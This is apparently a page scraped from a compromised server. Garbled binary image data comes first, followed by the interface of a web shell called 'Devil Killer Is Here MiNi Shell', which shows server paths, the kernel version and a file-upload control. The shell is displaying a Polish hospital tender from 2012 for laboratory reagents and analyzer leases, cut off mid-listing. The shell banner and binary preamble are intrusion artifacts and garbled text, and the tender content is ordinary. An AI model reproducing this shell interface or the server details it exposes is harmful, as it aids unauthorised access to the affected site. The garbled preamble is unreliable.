JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/61279-N-2012.html

<p class="kh_header"><b>Oleśnica: Dostawa odczynników i materiałów zużywalnych oraz dzierżawa analizatorów dla laboratoriów Powiatowego Zespołu Szpitali w Oleśnicy</b><br>
<b>Numer ogłoszenia: 61279 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zespół Szpitali w Oleśnicy , ul. Armii Krajowej 1, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3143747, faks 071 3143747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzsolesnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników i materiałów zużywalnych oraz dzierżawa analizatorów dla laboratoriów Powiatowego Zespołu Szpitali w Oleśnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa odczynników i materiałów zużywalnych do wykonywania oznaczeń morfologii krwi z rozdziałem WBC na 5 populacji wraz z dzierżawą dwóch analizatorów, dostawa odczynników i materiałów zużywalnych do badań układu krzepnięcia wraz z dzierżawą analizatora dla Laboratorium w Oleśnicy, dostawa odczynników i materiałów zużywalnych do koagulometru K - 3002 OPTIC wraz z wykonaniem przeglądów okresowych, dostawa odczynników i płynów do badań z zakresu serologii transfuzjologicznej, dostawa odczynników i materiałów zużywalnych wraz z dzierżawą niezbędnego sprzętu do wykonywania badań z zakresu serologii transfuzjologicznej przy użyciu metody mikrokolumnowej, dostawa pasków do badań fizykochemicznych moczu kompatybilnych z czytnikiem Clinitec Status oraz dostawa materiałów kontrolnych do analizatora Omni C, dostawa sprzętu do analizy osadu moczu.

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.

Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne pakiety:
Pakiet nr 1 - Odczynniki do oznaczania grup krwi metodą manualną
Pakiet nr 2 - Roztwór PBS do rozcieńczania i zawieszania krwinek w badaniach z zakresu serologii transfuzjologicznej
Pakiet nr 3 - Odczynniki i materiały zużywalne do badań z zakresu serologii transfuzjologicznej z zastosowaniem techniki mikrokolumnowej wraz z dzierżawą niezbędnego sprzętu
Pakiet nr 4 - Dostawa odczynników i materiałów zużywalnych do badań hematologicznych wraz z dzierżawą dwóch analizatorów 5 diff
Pakiet nr 5 - Dostawa odczynników i materiałów zużywalnych do badań układu krzepnięcia wraz z dzierżawą analizatora automatycznego dla laboratorium w Oleśnicy
Pakiet nr 6 - Dostawa odczynników i materiałów zużywalnych do badań układu krzepnięcia wykonywanych na koagulometrze K-3002 OPTIC
Pakiet nr 7 - Dostawa pasków do badań fizykochemicznych moczu kompatybilnych z czytnikiem Clinitec Status
Pakiet nr 8 - Dostawa materiałów kontrolnych do analizatora RKZ OMNI C
Pakiet nr 9 - Dostawa sprzętu do analizy osadu moczu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.20-7, 33.69.62.00-7, 33.69.65.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o przedmiotowe zamówienie nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych oraz musi spełniać wszystkie warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Na potwierdzenie spełniania tego warunku Wykonawca musi złożyć oświadczenie według wzoru stanowiącego załącznik nr 4 do SIWZ oraz dokumenty wymienione w punkcie 10 a), b) SIWZ.

Spełnienie warunków udziału w postępowaniu oceniane będzie wg kryterium spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, że Wykonawca w/w warunki spełnił. Niespełnienie któregoś z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi również zawierać następujące dokumenty i oświadczenia:
a)  wypełniony formularz asortymentowo-cenowy (załącznik nr 2 do SIWZ)
b) w przypadku reprezentowania Wykonawcy przez pełnomocnika, do oferty musi być załączony oryginał pełnomocnictwa lub jego kopia poświadczona notarialnie
c) oświadczenie, że Wykonawca posiada w zakresie oferowanych wyrobów dokumenty zezwalające na ich wprowadzenie do obrotu i stosowania. 
d) jeżeli odrębne przepisy nie wymagają wpisu do rejestru, do oferty należy dołączyć dokument, z którego będzie wynikało, że osoba, która podpisała ofertę jest upoważniona do reprezentowania firmy.
e) deklaracja CE do każdego produktu - jeżeli jest wymagana
f) ulotki zawierające opis oferowanych odczynników i materiałów zużywalnych
g) W przypadku złożenia oferty na Pakiety nr 1, 3, 4, 5, 6, 7, 8 do oferty należy dołączyć dokumenty potwierdzające spełnienie warunków wymaganych oraz ocenianych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy na dostawę odczynników wymagają formy pisemnej pod rygorem nieważności, z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych i strony postanawiają, że jedyna dopuszczalna zmiana warunków umowy może dotyczyć ceny w części dotyczącej zmiany stawki podatku VAT oraz w przypadku niewyczerpania przez Zamawiającego wartości umowy w okresie jej trwania, Strony mają prawo do przedłużenia terminu obowiązywania umowy, bez zwiększania jej wartości. Strony dopuszczają również zmianę warunków umowy w zakresie numeru katalogowego produktu i nazwy produktu przy zachowaniu jego parametrów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzsolesnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 09:00, miejsce: Powiatowy Zespół Szpitali
ul. Armii Krajowej 1
56-400 Oleśnica
piętro IV, pokój 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Odczynniki do oznaczania grup krwi metodą manualną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odczynnik monoklonalny anty A klon I
Ilość na 12 miesięcy - 300 ml
2. Odczynnik monoklonalny anty A klon II
Ilość na 12 miesięcy - 350 ml
3. Odczynnik monoklonalny anty B klon I - Ilość na 12 miesięcy 300 ml
4. Odczynnik monoklonalny anty B klon II - Ilość na 12 miesięcy 350 ml
5. Odczynnik monoklonalny anty D IgM - Ilość na 12 miesięcy 420 ml
6. Odczynnik monoklonalny anty D IgM+IgG -  Ilość na 12 miesięcy 450 ml
7. Odczynnik antyglobulinowy poliwalentny -  Ilość na 12 miesięcy 240 ml
8. Standard anty-D -  Ilość na 12 miesięcy 250 ml
9. Surowica ludzka grupy AB -  Ilość na 12 miesięcy 50 ml
10. Standaryzowane krwinki wzorcowe do układu AB0	Zestaw 3x4 ml -  Ilość na 12 miesięcy 72

Warunki graniczne (wymagane) dot. Pakietu nr 1
1. Odczynniki monoklonalne anty-A i anty-B, z przeciwciałami klasy IgM pochodzącymi z dwóch różnych klonów komórkowych
2. Odczynnik monoklonalny anty-D z przeciwciałami klasy IgM reagującymi także z antygenem D słabe (DU), nie rozpoznającymi kategorii DVI antygenu D
3. Odczynnik monoklonalny anty-D z przeciwciałami klasy IgM i IgG pochodzącymi z hybrydowej hodowli komórkowej reagującymi także z antygenem D słabe (DU), rozpoznającymi także kategorię DVI antygenu D
4. Płynny Standard anty-D zawierający przeciwciała anty-D klasy IgG w stężeniu 0,1 IU IgG anty-D/ml (0,02ug/ml) 
5. Surowica grupy AB, ludzka nie zawierająca substancji hamujących aglutynację i nie powodująca nieswoistych reakcji serologicznych w badaniach in vitro
6. Standaryzowane krwinki wzorcowe do układu AB0 - Gotowe do użycia bez dodatkowego przygotowania
Zestaw zawierający krwinki grup:
0
A1
B
Wśród krwinek wchodzących w skład zestawu powinny znajdować się krwinki Rh D + (dodatnie), oraz Rh D - (ujemne). 
Krwinki zawieszone w roztworze konserwującym zabezpieczającym przed hemolizą stanowiącym jednocześnie środowisko reakcji (Zamawiający nie dopuszcza możliwości odpłukiwania krwinek i przygotowywania ich do użycia)  i zachowującym właściwości krwinek w okresie ważności zestawu (Zamawiający nie dopuszcza możliwości odpłukiwania krwinek i przygotowywania ich do użycia w przypadku wystąpienia hemolizy), w stężeniu umożliwiającym ich bezpośrednie użycie.
7. Wszystkie odczynniki konfekcjonowane w buteleczki z zakraplaczem umożliwiającym precyzyjne dozowanie odczynnika. Odczynniki z pozycji 1-9 konfekcjonowane w buteleczkach o maksymalnej objętości 10 ml 
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty. 

Parametry oceniane
maksymalny czas reakcji odczynnika z badanymi krwinkami 
5 min - 15 pkt
> 5 min - 0 pkt
Oferent ma obowiązek przedstawienia w ofercie dokumentacji, na podstawie której Zamawiający dokona oceny przedstawionych parametrów odczynników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. ocena odczynników - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Roztwór PBS do rozcieńczania i zawieszania krwinek w badaniach z zakresu serologii transfuzjologicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PBS - koncentrat x 10 
Odczynnik ciekły do sporządzania roztworu roboczego w stosunku 1 część koncentratu + 9 części wody destylowanej)
Zakres pH roztworu roboczego: 6,8 - 7,2
Ilość na 24 miesiące: 35000 ml.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 -  Odczynniki i materiały zużywalne do badań z zakresu serologii transfuzjologicznej z zastosowaniem techniki mikrokolumnowej wraz z dzierżawą niezbędnego sprzętu dla laboratorium w Oleśnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki i materiały zużywalne
1. Karty do oznaczeń grup krwi u noworodków (badanie podstawowe + badanie potwierdzające) - ilość 280 opakowań
2. Karta do próby zgodności w teście PTA-LISS - ilość: 1500 opakowań
3. Karta do badania przeglądowego przeciwciał w teście PTA-LISS	 - ilość: 3100 opakowań
4. Zestaw krwinek wzorcowych do badania przeglądowego przeciwciał
5. Odczynnik LISS do zawieszania krwinek dawców
6. Zewnątrzlaboratoryjna międzynarodowa kontrola jakości
7. Końcówki do pipety

Przy wyliczaniu ilości niezbędnych odczynników Wykonawca do podanych ilości badań doliczy badania kontrolne (kontrola dodatnia i ujemna) w ilości 2 badań kontrolnych na dzień przez 365 dni w roku. 
Ilość oferowanych opakowań odczynników musi uwzględniać ich trwałość po otwarciu przy założeniu równomiernej realizacji zapotrzebowania przez cały okres umowy.
Ilość niezbędnych opakowań należy wyliczyć zaokrąglając w górę do pełnego opakowania 
W ofercie należy zawrzeć wszystkie niezbędne do wykonania badań przyrządy akcesoria i odczynniki. W przypadku przedstawienia oferty niekompletnej Wykonawca zobowiązuje się do dostarczania brakujących elementów nieodpłatnie przez cały okres umowy.
Zestaw sprzętu do wykonywania badań musi zawierać co najmniej wirówkę, dozownik do odczynnika LISS oraz pipetę automatyczną z funkcją multidozowania.

Warunki graniczne dot. Pakietu nr 3
1. Karty do badania przeglądowego przeciwciał, oraz prób zgodności dawca - biorca metodą mikrokolumnową, wypełnione żelem dekstranowym i surowicą antyglobulinową poliwalentną
2. Karty do oznaczania grup krwi u noworodków metodą mikrokolumnową, wypełnione żelem dekstranowym i odczynnikami monoklonalnymi
3. Odczynnik LISS odpowiedni do stosowanej metody
4. Odczynniki gotowe do użycia przechowywane w temp. 2-8°C lub temperaturze pokojowej
5. Odczynniki, karty i krwinki wzorcowe (za wyjątkiem krwinek do zewnątrz laboratoryjnej międzynarodowej kontroli jakości)  pochodzące od jednego producenta
6. Dostawa odczynników transportem monitorowanym pod względem zgodności z zaleceniami producenta
7. Instrukcja obsługi sprzętu oraz procedury wykonywania badań w języku polskim
8. Gwarancja i bezpłatny serwis i przeglądy okresowe sprzętu w okresie umowy 
9. Czas reakcji serwisu i usunięcia usterki w przypadku awarii - maksymalnie 24 godziny. W przypadku braku możliwości usunięcia usterki w tym czasie Wykonawca nieodpłatnie zapewni w ciągu maks. 24 godzin urządzenie zastępcze do czasu usunięcia awarii.
10. Walidacja sprzętu po zamontowaniu, oraz bezpłatna walidacja okresowa zgodna z odpowiednimi przepisami (nie rzadziej niż raz w roku)
11 Kontrola zewnątrz laboratoryjna wykonywana 4 razy w roku (kwartalnie)
12. Nieodpłatne przeszkolenie personelu Zamawiającego w siedzibie Zamawiającego
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 38.43.45.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Dostawa odczynników i materiałów zużywalnych do badań hematologicznych wraz z dzierżawą dwóch analizatorów 5 diff.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakładana ilość badań w okresie umowy (24 miesiące) - 55800 badań - w trybie 5 diff i 30000 w trybie CBC
1. Odczynniki i materiały zużywalne
Wykonawca oświadcza, że wskazany w formularzu asortyment jest wystarczający dla prawidłowego wykonania w/w ilości oznaczeń. W przypadku nieuwzględnienia asortymentu potrzebnego do wykonania w/w ilości oznaczeń Wykonawca zobowiązuje się do bezpłatnego zapewnienia tego asortymentu Zamawiającemu. Wykonawca pokrywa koszt zakupu i transportu towaru do zamawiającego.

Warunki graniczne dot. Pakietu nr 4
1. Analizator z rozdziałem krwinek białych - 5 diff
2. Ilość raportowanych parametrów hematologicznych - minimum 24
3. Parametry mierzone:
- erytrocyty
- hemoglobina
- trombocyty
- leukocyty
Różnicowanie leukocytów:
- neurocyty
- limfocyty
- monocyty
- eozyno file
- bazofile
4. Ocena całkowitej liczby WBC metodą optyczną
5. Dowolność trybu oznaczenia dla każdej próbki (CBC lub CBC + DIFF)
6. Różnicowanie WBC na 5 populacji przy użyciu cystometrii przepływowej z wykorzystaniem światła laserowego
7. Objętość aspirowanej próbki do 150 ul. (w obu trybach - CBC i CBC - DIFF)
8. Wydajność ok. 60 oznaczeń/godzinę
9. Maksymalna liczba reagentów (wraz z odczynnikiem odbiałczającym) - 5
10. Odczynniki bezcyjankowe
11 W trybie CBC oszczędność odczynników
12. Liniowość: RBC min do 7 M/ul.; WBC min do 250 K/ul.; PLT min do 2000 K/ul.; HGB min do 25 g/dl
13. Możliwość oceny niedojrzałych granulocytów jako odrębnej populacji wyrażonej w wartościach bezwzględnych i procentach
14. Flagowanie wyników patologicznych wraz z komunikatami opisującymi typowe patologie
15. Graficzna prezentacja wyników - histogram, skategram
16. Możliwość wprowadzania danych demograficznych pacjenta
17. Dowolność redagowania wydruku wyniku wraz z podaniem odpowiednich wartości referencyjnych dla płci i wieku
18. Zarządzanie odczynnikami - szacowanie przez system zużycia odczynników i możliwość kontroli ilości odczynników w dowolnym czasie
19. Jeden rodzaj krwi kontrolnej dla wszystkich parametrów, parametry krwi kontrolnej wczytywane za pomocą dyskietki, dysku CD lub kodu)
20. Analizator wyposażony w zewnętrzny komputer (jeśli nie jest wbudowany), monitor oraz drukarkę laserową i zasilacz UPS)
21. Oprogramowanie obejmujące system kontroli jakości, archiwizacje wyników pacjentów i możliwość dowolnej konfiguracji wydruku wyników badań w zależności od potrzeb laboratorium
22. Możliwość dwukierunkowej komunikacji z systemem informatycznym w czasie rzeczywistym i wprowadzania danych demograficznych pacjenta z LIS
23. Bezpłatny serwis w okresie umowy
24. Bezpłatna aktualizacja oprogramowania w okresie trwania umowy
25. Maksymalny czas usunięcia awarii do 48 godzin
26. Przeszkolenie z obsługi aparatu w siedzibie Zamawiającego
27. Bezpłatne podłączenie i konfiguracja aparatu do LIS (e-lab firmy Eclipse)
Niespełnienie wymaganych parametrów i warunków spowoduje odrzucenie oferty. 

Parametry oceniane
1. Pomiar HGB w osobnym kanale pomiarowym niezależnie od WBC, gwarantujący brak interferencji ze strony krwinek białych i lipidów - 10 pkt
2. Objętość aspirowanej próbki maksymalnie 20 ul -10 pkt
3. Możliwość wykonywania oznaczeń w trybie kapilarnym (także z oznaczeniem w trybie 5 Diff) - 10 pkt
Oferent ma obowiązek przedstawienia w ofercie dokumentacji, na podstawie której Zamawiający dokona oceny przedstawionych parametrów odczynników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.62.00-7, 33.69.65.00-0, 38.43.45.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena parametrów technicznych - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5 - Dostawa odczynników i materiałów zużywalnych do badań układu krzepnięcia wraz z dzierżawą analizatora automatycznego dla laboratorium w Oleśnicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odczynniki 
1. Zestaw do oznaczania czasu protrombinowego - PT 
ilość badań w okresie obowiązywania umowy: 12 177
2. Zestaw do oznaczania czasu kaolinowo-kefalinowego -APTT
